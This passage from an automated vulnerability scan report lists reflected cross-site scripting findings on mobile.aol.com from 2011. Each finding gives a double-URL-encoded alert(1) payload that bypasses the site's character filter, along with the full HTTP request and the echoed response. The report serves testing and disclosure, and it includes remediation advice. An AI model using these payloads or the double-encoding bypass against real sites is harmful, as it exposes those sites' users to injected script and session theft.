Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617406288-Repeat%7C1367689406288%3B%20s_nrgvo%3DRepeat%7C1367689406289%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolmobdash%252Caolsvc%253D%252526pid%25253Dmbd%25252520%2525253A%25252520Engadget%25252520-%25252520iPhone%25252520App%25252520-%25252520iPhone%25252520Applications%25252520from%25252520AOL%25252520Mobile%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//mobile.aol.com/product/Android/dailyfinance/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:46:17 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:46:17 GMT; path=/
Content-Type: text/html
Content-Length: 23669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
d : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="Android";
   s_265.prop2="dailyfinancefbd7c</script><script>alert(1)</script>2ee1b9a6005";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.109. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/Autos/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d5bb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8011fad6621 was submitted in the REST URL parameter 2. This input was echoed as 2d5bb</script><script>alert(1)</script>8011fad6621 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone2d5bb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8011fad6621/Autos/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:21 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:21 GMT; path=/
Content-Type: text/html
Content-Length: 23696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone2d5bb</script><script>alert(1)</script>8011fad6621";
   s_265.prop2="Autos";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
...[SNIP]...

5.110. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/Autos/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3dbb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e554b60a6c64 was submitted in the REST URL parameter 2. This input was echoed as e3dbb</script><script>alert(1)</script>554b60a6c64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhonee3dbb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e554b60a6c64/Autos/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:37 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:37 GMT; path=/
Content-Type: text/html
Content-Length: 23696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhonee3dbb</script><script>alert(1)</script>554b60a6c64';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.111. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/Autos/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d3d0%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef200d36df9f was submitted in the REST URL parameter 3. This input was echoed as 9d3d0</script><script>alert(1)</script>f200d36df9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/Autos9d3d0%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef200d36df9f/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617152782-Repeat%7C1367689152782%3B%20s_nrgvo%3DRepeat%7C1367689152783%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:02 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:42:02 GMT; path=/
Content-Type: text/html
Content-Length: 23645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
Name="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="Autos9d3d0</script><script>alert(1)</script>f200d36df9f";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.112. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/aim/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88bf2%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a90bdd3ac8 was submitted in the REST URL parameter 2. This input was echoed as 88bf2</script><script>alert(1)</script>4a90bdd3ac8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone88bf2%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a90bdd3ac8/aim/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:09 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:09 GMT; path=/
Content-Type: text/html
Content-Length: 23688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone88bf2</script><script>alert(1)</script>4a90bdd3ac8";
   s_265.prop2="aim";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');

...[SNIP]...

5.113. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/aim/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d92eb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87274d846fd was submitted in the REST URL parameter 2. This input was echoed as d92eb</script><script>alert(1)</script>87274d846fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhoned92eb%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87274d846fd/aim/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:24 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:24 GMT; path=/
Content-Type: text/html
Content-Length: 23690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhoned92eb</script><script>alert(1)</script>87274d846fd';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.114. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/aim/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3c0e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2d4fca6251 was submitted in the REST URL parameter 3. This input was echoed as a3c0e</script><script>alert(1)</script>f2d4fca6251 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/aima3c0e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2d4fca6251/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617134192-Repeat%7C1367689134192%3B%20s_nrgvo%3DRepeat%7C1367689134194%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:49 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:49 GMT; path=/
Content-Type: text/html
Content-Length: 23639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
geName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="aima3c0e</script><script>alert(1)</script>f2d4fca6251";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.115. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/aol-radio/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85a75%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee73e678bbd was submitted in the REST URL parameter 2. This input was echoed as 85a75</script><script>alert(1)</script>ee73e678bbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone85a75%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee73e678bbd/aol-radio/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:30 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:30 GMT; path=/
Content-Type: text/html
Content-Length: 23708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhone85a75</script><script>alert(1)</script>ee73e678bbd';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.116. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/aol-radio/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed1ec%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e16f4afc7846 was submitted in the REST URL parameter 2. This input was echoed as ed1ec</script><script>alert(1)</script>16f4afc7846 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhoneed1ec%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e16f4afc7846/aol-radio/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:15 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:15 GMT; path=/
Content-Type: text/html
Content-Length: 23708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhoneed1ec</script><script>alert(1)</script>16f4afc7846";
   s_265.prop2="aol-radio";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script
...[SNIP]...

5.117. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/aol-radio/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76830%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9a6362a6e9 was submitted in the REST URL parameter 3. This input was echoed as 76830</script><script>alert(1)</script>a9a6362a6e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/aol-radio76830%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9a6362a6e9/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:55 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
